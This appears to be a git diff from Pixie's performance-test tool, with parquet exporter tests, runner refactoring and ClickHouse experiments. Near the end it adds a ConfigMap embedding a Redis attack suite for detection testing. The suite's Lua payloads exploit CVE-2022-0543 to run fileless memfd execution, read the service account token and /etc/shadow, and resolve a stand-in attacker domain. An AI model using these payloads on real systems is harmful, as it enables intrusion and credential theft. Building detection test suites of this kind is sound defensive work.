int64(2), pf.NumRows()) + + // Verify schema has expected columns. + fields := schema.Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + + // Re-open the file for the reader (the File consumed the initial handle). + f2, err := os.Open(uploadedPath) + require.NoError(t, err) + defer f2.Close() + + reader := parquet.NewReader(f2) + defer reader.Close() + + parquetRows := make([]parquet.Row, 2) + n, err := reader.ReadRows(parquetRows) + // ReadRows returns io.EOF when it reaches the end, even if it read rows. + if err != nil && !errors.Is(err, io.EOF) { + require.NoError(t, err) + } + assert.Equal(t, 2, n) + + // First row should have all tags present. + // Second row should have tag_node_name as null. + // Column order (alphabetical): experiment_id(0), name(1), tag_node_name(2), tag_pod(3), timestamp(4), value(5) + row0NodeName := parquetRows[0][2] + assert.False(t, row0NodeName.IsNull(), "first row tag_node_name should be present") + + row1NodeName := parquetRows[1][2] + assert.True(t, row1NodeName.IsNull(), "second row tag_node_name should be null") +} + +func TestExportResults_SingleBatch(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + prefix: "perf-results", + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 3) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + resultCh <- &metrics.ResultRow{ + Timestamp: ts, + Name: "cpu_seconds_counter", + Value: 100.5, + Tags: map[string]string{"pod": "server-abc"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(30 * time.Second), + Name: "rss", + Value: 2097152, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(60 * time.Second), + Name: "vsize", + Value: 4194304, + Tags: map[string]string{"pod": "server-abc", "node_name": "node-0"}, + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // Should have produced exactly one batch file. + assert.Equal(t, 1, len(uploadedFiles), "expected exactly one parquet file") + + // Verify the GCS path includes the date and experiment ID. + for objectPath := range uploadedFiles { + assert.Contains(t, objectPath, expID.String()) + assert.Contains(t, objectPath, "perf-results/") + assert.Contains(t, objectPath, "results_0000.parquet") + } + + // Read the parquet file and verify row count. + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + + stat, err := f.Stat() + require.NoError(t, err) + + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + assert.Equal(t, int64(3), pf.NumRows()) + + // Verify schema has tag columns from the union of all rows. + fields := pf.Schema().Fields() + fieldNames := make([]string, len(fields)) + for i, f := range fields { + fieldNames[i] = f.Name() + } + sort.Strings(fieldNames) + assert.Equal(t, []string{ + "experiment_id", + "name", + "tag_node_name", + "tag_pod", + "timestamp", + "value", + }, fieldNames) + } +} + +func TestExportResults_MultipleBatches(t *testing.T) { + tmpDir := t.TempDir() + uploadedFiles := make(map[string]string) + + expID := uuid.Must(uuid.NewV4()) + e := &ParquetGCSExporter{ + batchSize: 2, // Small batch size to force multiple files. + upload: func(ctx context.Context, objectPath string, localPath string) error { + dest := filepath.Join(tmpDir, strings.ReplaceAll(objectPath, "/", "_")) + src, err := os.Open(localPath) + if err != nil { + return err + } + defer src.Close() + dst, err := os.Create(dest) + if err != nil { + return err + } + defer dst.Close() + if _, err := io.Copy(dst, src); err != nil { + return err + } + uploadedFiles[objectPath] = dest + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow, 5) + ts := time.Date(2026, 4, 15, 14, 0, 0, 0, time.UTC) + for i := 0; i < 5; i++ { + resultCh <- &metrics.ResultRow{ + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.1, + Tags: map[string]string{"pod": "test-pod"}, + } + } + close(resultCh) + + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + + // 5 rows with batch size 2 should produce 3 files: [2, 2, 1]. + assert.Equal(t, 3, len(uploadedFiles), "expected 3 parquet files for 5 rows with batch size 2") + + // Verify file naming. + hasFile0, hasFile1, hasFile2 := false, false, false + for objectPath := range uploadedFiles { + if strings.Contains(objectPath, "results_0000.parquet") { + hasFile0 = true + } + if strings.Contains(objectPath, "results_0001.parquet") { + hasFile1 = true + } + if strings.Contains(objectPath, "results_0002.parquet") { + hasFile2 = true + } + } + assert.True(t, hasFile0, "missing results_0000.parquet") + assert.True(t, hasFile1, "missing results_0001.parquet") + assert.True(t, hasFile2, "missing results_0002.parquet") + + // Verify total row count across all files. + totalRows := int64(0) + for _, localPath := range uploadedFiles { + f, err := os.Open(localPath) + require.NoError(t, err) + defer f.Close() + stat, err := f.Stat() + require.NoError(t, err) + pf, err := parquet.OpenFile(f, stat.Size()) + require.NoError(t, err) + totalRows += pf.NumRows() + } + assert.Equal(t, int64(5), totalRows) +} + +func TestExportResults_EmptyChannel(t *testing.T) { + uploadCalled := false + e := &ParquetGCSExporter{ + batchSize: 100, + upload: func(ctx context.Context, objectPath string, localPath string) error { + uploadCalled = true + return nil + }, + } + + resultCh := make(chan *metrics.ResultRow) + close(resultCh) + + expID := uuid.Must(uuid.NewV4()) + err := e.ExportResults(context.Background(), expID, resultCh) + require.NoError(t, err) + assert.False(t, uploadCalled, "no files should be uploaded for empty channel") +} + +// --- Benchmarks --- + +// makeBenchRows generates n buffered rows with the specified number of tag keys. +func makeBenchRows(n int, numTags int) []bufferedRow { + ts := time.Date(2026, 4, 15, 12, 0, 0, 0, time.UTC) + rows := make([]bufferedRow, n) + for i := range rows { + tags := make(map[string]string, numTags) + for j := 0; j < numTags; j++ { + tags[fmt.Sprintf("tag_key_%d", j)] = fmt.Sprintf("value_%d_%d", i, j) + } + rows[i] = bufferedRow{ + ExperimentID: "bench-exp-id", + Timestamp: ts.Add(time.Duration(i) * 30 * time.Second), + Name: "cpu_usage", + Value: float64(i) * 0.01, + Tags: tags, + } + } + return rows +} + +func BenchmarkBuildResultRow(b *testing.B) { + for _, numTags := range []int{2, 5, 10} { + b.Run(fmt.Sprintf("tags=%d", numTags), func(b *testing.B) { + rows := makeBenchRows(1, numTags) + tagKeys := collectTagKeys(rows) + row := rows[0] + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + buildResultRow(row, tagKeys) + } + }) + } +} + +func BenchmarkCollectTagKeys(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + collectTagKeys(rows) + } + }) + } +} + +func BenchmarkFlushBatch(b *testing.B) { + for _, numRows := range []int{100, 1000, 10000} { + b.Run(fmt.Sprintf("rows=%d", numRows), func(b *testing.B) { + rows := makeBenchRows(numRows, 3) + e := &ParquetGCSExporter{ + batchSize: numRows, + upload: func(ctx context.Context, objectPath string, localPath string) error { + // No-op upload: measures only in-memory conversion + parquet write to disk. + return nil + }, + } + b.ResetTimer() + b.ReportAllocs() + for i := 0; i < b.N; i++ { + if err := e.flushBatch(context.Background(), "bench/path", 0, rows); err != nil { + b.Fatal(err) + } + } + }) + } +} diff --git a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go index 19d08b1b0a9..8e5c1768e24 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/prometheus_recorder.go @@ -43,10 +43,11 @@ import ( ) type prometheusRecorderImpl struct { - clusterCtx *cluster.Context - spec *experimentpb.PrometheusScrapeSpec - eg *errgroup.Group - resultCh chan<- *ResultRow + clusterCtx *cluster.Context + ownsClusterCtx bool + spec *experimentpb.PrometheusScrapeSpec + eg *errgroup.Group + resultCh chan<- *ResultRow wg sync.WaitGroup stopCh chan struct{} @@ -79,6 +80,9 @@ func (r *prometheusRecorderImpl) Close() { for _, fw := range r.fws { fw.Close() } + if r.ownsClusterCtx { + r.clusterCtx.Close() + } } func (r *prometheusRecorderImpl) run() error { diff --git a/src/e2e_test/perf_tool/pkg/metrics/recorder.go b/src/e2e_test/perf_tool/pkg/metrics/recorder.go index 7e7e44e06e2..12bdf8fd502 100644 --- a/src/e2e_test/perf_tool/pkg/metrics/recorder.go +++ b/src/e2e_test/perf_tool/pkg/metrics/recorder.go @@ -20,6 +20,7 @@ package metrics import ( "context" + "fmt" "golang.org/x/sync/errgroup" @@ -35,7 +36,7 @@ type Recorder interface { } // NewMetricsRecorder creates a new Recorder for the given MetricSpec. -func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) Recorder { +func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec *experimentpb.MetricSpec, eg *errgroup.Group, resultCh chan<- *ResultRow) (Recorder, error) { switch spec.MetricType.(type) { case *experimentpb.MetricSpec_PxL: return &pxlScriptRecorderImpl{ @@ -44,14 +45,26 @@ func NewMetricsRecorder(pxCtx *pixie.Context, clusterCtx *cluster.Context, spec eg: eg, resultCh: resultCh, - } + }, nil case *experimentpb.MetricSpec_Prom: - return &prometheusRecorderImpl{ - clusterCtx: clusterCtx, - spec: spec.GetProm(), - eg: eg, - resultCh: resultCh, + promSpec := spec.GetProm() + recorderCtx := clusterCtx + ownsCtx := false + if promSpec.KubeconfigPath != "" || promSpec.KubeContext != "" { + var err error + recorderCtx, err = cluster.NewContextFromOptions(promSpec.KubeconfigPath, promSpec.KubeContext) + if err != nil { + return nil, fmt.Errorf("failed to create cluster context for prometheus recorder: %w", err) + } + ownsCtx = true } + return &prometheusRecorderImpl{ + clusterCtx: recorderCtx, + ownsClusterCtx: ownsCtx, + spec: promSpec, + eg: eg, + resultCh: resultCh, + }, nil } - return nil + return nil, nil } diff --git a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel index 55b3fdc18a9..524a3cab626 100644 --- a/src/e2e_test/perf_tool/pkg/run/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/run/BUILD.bazel @@ -18,19 +18,16 @@ load("@io_bazel_rules_go//go:def.bzl", "go_library") go_library( name = "run", - srcs = [ - "row.go", - "run.go", - ], + srcs = ["run.go"], importpath = "px.dev/pixie/src/e2e_test/perf_tool/pkg/run", visibility = ["//visibility:public"], deps = [ "//src/e2e_test/perf_tool/experimentpb:experiment_pl_go_proto", "//src/e2e_test/perf_tool/pkg/cluster", "//src/e2e_test/perf_tool/pkg/deploy", + "//src/e2e_test/perf_tool/pkg/exporter", "//src/e2e_test/perf_tool/pkg/metrics", "//src/e2e_test/perf_tool/pkg/pixie", - "//src/shared/bq", "@com_github_cenkalti_backoff_v4//:backoff", "@com_github_gofrs_uuid//:uuid", "@com_github_gogo_protobuf//jsonpb", diff --git a/src/e2e_test/perf_tool/pkg/run/run.go b/src/e2e_test/perf_tool/pkg/run/run.go index b02b15219c2..2a5af23d06e 100644 --- a/src/e2e_test/perf_tool/pkg/run/run.go +++ b/src/e2e_test/perf_tool/pkg/run/run.go @@ -39,18 +39,22 @@ import ( "px.dev/pixie/src/e2e_test/perf_tool/experimentpb" "px.dev/pixie/src/e2e_test/perf_tool/pkg/cluster" "px.dev/pixie/src/e2e_test/perf_tool/pkg/deploy" + "px.dev/pixie/src/e2e_test/perf_tool/pkg/exporter" "px.dev/pixie/src/e2e_test/perf_tool/pkg/metrics" "px.dev/pixie/src/e2e_test/perf_tool/pkg/pixie" - "px.dev/pixie/src/shared/bq" ) // Runner is responsible for running experiments using the ClusterProvider to get a cluster for the experiment. type Runner struct { c cluster.Provider pxCtx *pixie.Context - resultTable *bq.Table - specTable *bq.Table + exporter exporter.Exporter containerRegistryRepo string + skaffoldStderrFile string + // KeepOnFailure, when true, skips teardown (stop vizier/workloads/recorders + // and cluster cleanup) if the experiment errors, so the cluster state can + // be inspected after the fact. Successful runs still tear down normally. + keepOnFailure bool clusterCtx *cluster.Context clusterCleanup func() @@ -66,16 +70,24 @@ type Runner struct { } // NewRunner creates a new Runner for the given contexts. -func NewRunner(c cluster.Provider, pxCtx *pixie.Context, resultTable *bq.Table, specTable *bq.Table, containerRegistryRepo string) *Runner { +// skaffoldStderrFile, when non-empty, is the path to which skaffold's stderr is appended +// during deploy steps. Pass "" to keep skaffold's stderr going only to the perf_tool +// process's stderr. +func NewRunner(c cluster.Provider, pxCtx *pixie.Context, exp exporter.Exporter, containerRegistryRepo, skaffoldStderrFile string) *Runner { return &Runner{ c: c, pxCtx: pxCtx, - resultTable: resultTable, - specTable: specTable, + exporter: exp, containerRegistryRepo: containerRegistryRepo, + skaffoldStderrFile: skaffoldStderrFile, } } +// SetKeepOnFailure toggles whether teardown is skipped on experiment failure. +func (r *Runner) SetKeepOnFailure(v bool) { + r.keepOnFailure = v +} + // RunExperiment runs an experiment according to the given ExperimentSpec. func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *experimentpb.ExperimentSpec) error { commitTopoOrder, err := getTopoOrder() @@ -83,14 +95,12 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return err } - eg := errgroup.Group{} - eg.Go(func() error { return r.getCluster(ctx, spec.ClusterSpec) }) - eg.Go(func() error { - if err := r.prepareWorkloads(ctx, spec); err != nil { - return backoff.Permanent(err) - } - return nil - }) + if err := r.getCluster(ctx, spec.ClusterSpec); err != nil { + return err + } + if err := r.prepareWorkloads(ctx, spec); err != nil { + return err + } r.metricsBySelector = make(map[string][]metrics.Recorder) r.metricsResultCh = make(chan *metrics.ResultRow) @@ -98,19 +108,23 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper defer metricsChCloseOnce.Do(func() { close(r.metricsResultCh) }) r.wg.Add(1) - go r.runBQInserter(expID) - - if err := eg.Wait(); err != nil { - if r.clusterCleanup != nil { - r.clusterCleanup() + go func() { + defer r.wg.Done() + if err := r.exporter.ExportResults(ctx, expID, r.metricsResultCh); err != nil { + log.WithError(err).Error("Failed to export results") } - if r.clusterCtx != nil { - r.clusterCtx.Close() + }() + + var runErr error + defer func() { + if r.keepOnFailure && runErr != nil { + log.WithError(runErr).Warn("Experiment failed; --keep_on_failure is set, leaving cluster state intact. " + + "Inspect with kubectl; you are responsible for manual cleanup (e.g. `px delete`, delete workload namespaces).") + return } - return err - } - defer r.clusterCleanup() - defer r.clusterCtx.Close() + r.clusterCleanup() + r.clusterCtx.Close() + }() var egCtx context.Context r.eg, egCtx = errgroup.WithContext(ctx) @@ -123,26 +137,16 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper }) if err := r.eg.Wait(); err != nil { + runErr = err return err } - // The experiment succeeded so we write the spec to bigquery. + // The experiment succeeded so we write the spec to the exporter. encodedSpec, err := (&jsonpb.Marshaler{}).MarshalToString(spec) if err != nil { return err } - specRow := &SpecRow{ - ExperimentID: expID.String(), - Spec: encodedSpec, - CommitTopoOrder: commitTopoOrder, - } - - inserter := r.specTable.Inserter() - inserter.SkipInvalidRows = false - - putCtx, cancel := context.WithTimeout(ctx, 5*time.Minute) - defer cancel() - if err := inserter.Put(putCtx, specRow); err != nil { + if err := r.exporter.ExportSpec(ctx, expID, encodedSpec, commitTopoOrder); err != nil { return err } @@ -152,8 +156,21 @@ func (r *Runner) RunExperiment(ctx context.Context, expID uuid.UUID, spec *exper return nil } -func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) error { +func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSpec) (retErr error) { canceledErr := backoff.Permanent(context.Canceled) + // Collect start-action cleanups explicitly so we can skip them when + // --keep_on_failure is set and the experiment errors. + var cleanups []func() + defer func() { + failed := retErr != nil || ctx.Err() != nil + if r.keepOnFailure && failed { + log.Warn("Skipping per-action teardown due to --keep_on_failure") + return + } + for i := len(cleanups) - 1; i >= 0; i-- { + cleanups[i]() + } + }() for _, a := range spec.RunSpec.Actions { log.Tracef("started action %s", experimentpb.ActionType_name[int32(a.Type)]) if canceled := r.sendActionTimestamp(ctx, a, "begin"); canceled { @@ -165,19 +182,19 @@ func (r *Runner) runActions(ctx context.Context, spec *experimentpb.ExperimentSp if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_WORKLOADS: cleanup, err := r.startWorkloads(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.START_METRIC_RECORDERS: cleanup, err := r.startMetricRecorders(ctx, spec, a.Name) if err != nil { return err } - defer cleanup() + cleanups = append(cleanups, cleanup) case experimentpb.STOP_VIZIER: if err := r.stopVizier(); err != nil { return err @@ -233,7 +250,11 @@ func (r *Runner) startMetricRecorders(ctx context.Context, spec *experimentpb.Ex continue } - recorder := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + recorder, err := metrics.NewMetricsRecorder(r.pxCtx, r.clusterCtx, ms, r.eg, r.metricsResultCh) + if err != nil { + _ = r.stopMetricRecorders(selector) + return noCleanup, fmt.Errorf("failed to create metrics recorder: %w", err) + } r.metricsBySelector[selector] = append(r.metricsBySelector[selector], recorder) if err := recorder.Start(ctx); err != nil { _ = r.stopMetricRecorders(selector) @@ -344,7 +365,7 @@ func (r *Runner) getCluster(ctx context.Context, spec *experimentpb.ClusterSpec) } func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.ExperimentSpec) error { - vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, spec.VizierSpec) + vizier, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, spec.VizierSpec) if err != nil { return err } @@ -355,7 +376,7 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi } r.workloadsBySelector = make(map[string][]deploy.Workload) for _, s := range spec.WorkloadSpecs { - w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, s) + w, err := deploy.NewWorkload(r.pxCtx, r.containerRegistryRepo, r.skaffoldStderrFile, s) if err != nil { return err } @@ -368,29 +389,6 @@ func (r *Runner) prepareWorkloads(ctx context.Context, spec *experimentpb.Experi return nil } -func (r *Runner) runBQInserter(expID uuid.UUID) { - defer r.wg.Done() - - bqCh := make(chan interface{}) - defer close(bqCh) - - inserter := &bq.BatchInserter{ - Table: r.resultTable, - BatchSize: 512, - PushTimeout: 2 * time.Minute, - } - go inserter.Run(bqCh) - - for row := range r.metricsResultCh { - bqRow, err := MetricsRowToResultRow(expID, row) - if err != nil { - log.WithError(err).Error("Failed to convert result row") - continue - } - bqCh <- bqRow - } -} - func getTopoOrder() (int, error) { cmd := exec.Command("git", "rev-list", "--count", "HEAD") var stdout bytes.Buffer diff --git a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel index 57b8a9fe368..5853d236094 100644 --- a/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel +++ b/src/e2e_test/perf_tool/pkg/suites/BUILD.bazel @@ -22,11 +22,16 @@ go_library( "clusters.go", "experiments.go", "metrics.go", + "sovereign_soc.go", "suites.go", "workloads.go", ], embedsrcs = [ + "scripts/clickhouse_export.pxl", + "scripts/clickhouse_read.pxl", + "scripts/forensic_alerts.pxl", "scripts/healthcheck/http_data_in_namespace.pxl", + "scripts/healthcheck/redis_data_in_namespace.pxl", "scripts/healthcheck/vizier.pxl", "scripts/heap_size.pxl", "scripts/http_data_loss.pxl", diff --git a/src/e2e_test/perf_tool/pkg/suites/experiments.go b/src/e2e_test/perf_tool/pkg/suites/experiments.go index 998b31c7197..ceaf7408e2b 100644 --- a/src/e2e_test/perf_tool/pkg/suites/experiments.go +++ b/src/e2e_test/perf_tool/pkg/suites/experiments.go @@ -36,7 +36,7 @@ func HTTPLoadTestExperiment( dur time.Duration, ) *experimentpb.ExperimentSpec { e := &experimentpb.ExperimentSpec{ - VizierSpec: VizierWorkload(), + VizierSpec: VizierReleaseWorkload(), WorkloadSpecs: []*experimentpb.WorkloadSpec{ HTTPLoadTestWorkload(numConnections, targetRPS, true), }, @@ -347,6 +347,132 @@ func HTTPLoadApplicationOverheadExperiment( return e } +// ClickHouseExportExperiment drives load against Pixie's ClickHouse export +// path. An HTTP loadtest populates http_events on the PEMs, and the +// clickhouse_export PxL script runs on a tight period to continuously export +// a windowed slice of http_events to ClickHouse. +func ClickHouseExportExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + exportPeriod time.Duration, + exportWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseExportLoadMetric(exportPeriod, clickhouseDSN, clickhouseTable, clickhouseTable, exportWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-export", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/export_window/%s", exportWindow), + ) + return e +} + +// ClickHouseReadExperiment drives load against Pixie's ClickHouse read path. +// HTTP loadtest populates http_events; a (placeholder) read-load workload +// drives sustained pressure against ClickHouse; the clickhouse_read PxL +// script periodically queries the ClickHouse source from Pixie so we can +// observe Pixie-side read performance as well. +func ClickHouseReadExperiment( + numConnections int, + targetRPS int, + metricPeriod time.Duration, + readPeriod time.Duration, + readWindow time.Duration, + clickhouseDSN string, + clickhouseTable string, + predeployDur time.Duration, + dur time.Duration, +) *experimentpb.ExperimentSpec { + e := &experimentpb.ExperimentSpec{ + VizierSpec: VizierWorkload(), + WorkloadSpecs: []*experimentpb.WorkloadSpec{ + HTTPLoadTestWorkload(numConnections, targetRPS, true), + ClickHouseReadLoadWorkload(), + }, + MetricSpecs: []*experimentpb.MetricSpec{ + ProcessStatsMetrics(metricPeriod), + // Stagger the second query a little bit because of query stability issues. + HeapMetrics(metricPeriod + (2 * time.Second)), + ClickHouseReadLoadMetric(readPeriod, clickhouseDSN, clickhouseTable, readWindow), + ClickHouseOperatorMetrics(metricPeriod), + }, + RunSpec: &experimentpb.RunSpec{ + Actions: []*experimentpb.ActionSpec{ + { + Type: experimentpb.START_VIZIER, + }, + { + Type: experimentpb.START_METRIC_RECORDERS, + }, + { + Type: experimentpb.BURNIN, + Duration: types.DurationProto(predeployDur), + }, + { + Type: experimentpb.START_WORKLOADS, + }, + { + Type: experimentpb.RUN, + Duration: types.DurationProto(dur), + }, + { + Type: experimentpb.STOP_METRIC_RECORDERS, + }, + }, + }, + ClusterSpec: DefaultCluster, + } + e = addTags(e, + "workload/clickhouse-read", + fmt.Sprintf("parameter/num_conns/%d", numConnections), + fmt.Sprintf("parameter/target_rps/%d", targetRPS), + fmt.Sprintf("parameter/read_window/%s", readWindow), + ) + return e +} + func addTags(e *experimentpb.ExperimentSpec, tags ...string) *experimentpb.ExperimentSpec { if e.Tags == nil { e.Tags = []string{} diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml new file mode 100644 index 00000000000..03a10f0dab8 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/bob-suite-attack-cm.yaml @@ -0,0 +1,377 @@ +# Pinned copy of upstream k8sstormcenter/bob@68fbfb83dc63f4e0184ecbf66d9c5f251a74b0b7 +# example/redis-attacks.yaml (Apache-2.0 licensed), wrapped as a ConfigMap so +# the bobctl-attack Job can mount it at /suite/redis-attacks.yaml. The bobctl +# CLI consumes this file via its --attack-suite flag (it is NOT a Kubernetes +# CRD, it is a bobctl-internal manifest). +--- +apiVersion: v1 +kind: ConfigMap +metadata: + name: bob-suite-attack + namespace: redis +data: + redis-attacks.yaml: | + apiVersion: bobctl.k8sstormcenter.io/v1alpha1 + kind: AttackSuite + metadata: + name: redis-full-attack-suite + description: >- + Comprehensive Redis attack suite (12 attacks) targeting a vulnerable + Redis 7.2.10 instance with CVE-2022-0543 (Lua sandbox escape via + package.loadlib / io.popen). Each attack has inline expectedDetections + for precise per-attack alert attribution via the AlertLedger. + target: + service: redis + namespace: redis + port: 6379 + protocol: redis + + attacks: + # ─── Attack 1: Fileless Execution via memfd_create (R1005) ─────────────── + - name: fileless-memfd-exec + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local cmd = "perl -e 'my $n=\"bob\\0\";my $fd=syscall(319,$n,0);die if $fd<0;open(my $s,\"<:raw\",\"/bin/cat\");open(my $d,\">&=\",$fd);binmode $d;my $b;while(read($s,$b,8192)){print $d $b}close $s;exec{\"/proc/self/fd/$fd\"}\"cat\",\"/etc/hostname\"'" + local f = io_mod.popen(cmd) + if not f then return 'popen_failed' end + local out = f:read('*a') + f:close() + return 'fileless:' .. out + successIndicators: + - responseContains: "fileless:" + expectedDetections: + - attackType: fileless + ruleID: R1005 + ruleName: "Fileless execution detected" + containerName: redis + + # ─── Attack 2: SA Token Exfiltration (R0006) ──────────────────────────── + - name: sa-token-exfil + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null || echo no_token') + local out = f:read('*a') + f:close() + return out + successIndicators: + - responseContains: "eyJ" + expectedDetections: + - attackType: fileless + ruleID: R0006 + ruleName: "Unexpected service account token access" + containerName: redis + command: cat + + # ─── Attack 3: Sensitive File Access /etc/shadow (R0010) ───────────────── + - name: read-etc-shadow + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('cat /etc/shadow 2>&1; echo shadow_attempted') + local out = f:read('*a') + f:close() + return 'shadow:' .. out + successIndicators: + - responseContains: "shadow_attempted" + expectedDetections: + - attackType: fileless + ruleID: R0010 + ruleName: "Unexpected Sensitive File Access" + containerName: redis + command: cat + + # ─── Attack 4: Unexpected Process - whoami (R0001) ─────────────────────── + - name: unexpected-process-whoami + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('whoami') + local out = f:read('*a') + f:close() + return 'user:' .. out + successIndicators: + - responseContains: "user:" + expectedDetections: + - attackType: fileless + ruleID: R0001 + ruleName: "Unexpected process launched" + containerName: redis + command: whoami + + # ─── Attack 5: DNS Anomaly - resolve evil domain (R0005) ───────────────── + - name: dns-anomaly-evil-domain + type: fileless + redis: + eval: | + local io_mod = nil + pcall(function() + if type(io) == 'table' and io.popen then io_mod = io end + end) + if not io_mod then + pcall(function() + local loader = package.loadlib('/usr/lib/x86_64-linux-gnu/liblua5.1.so.0', 'luaopen_io') + if loader then io_mod = loader() end + end) + end + if not io_mod then return 'sandbox_blocked' end + local f = io_mod.popen('getent hosts evil.attacker.example.com 2>&1 || echo dns_done') + local out = f:read('*a') + f:close() + return 'dns:' .. out + successIndicators: + - responseContains: "dns:" + expectedDetections: + - attackType: fileless + ruleID: R0005 + ruleName: "DNS Anomalies in container" + containerName: redis + + # ─── Attack 6: Drifted Binary Execution (R1001) ───────────────────────── + - 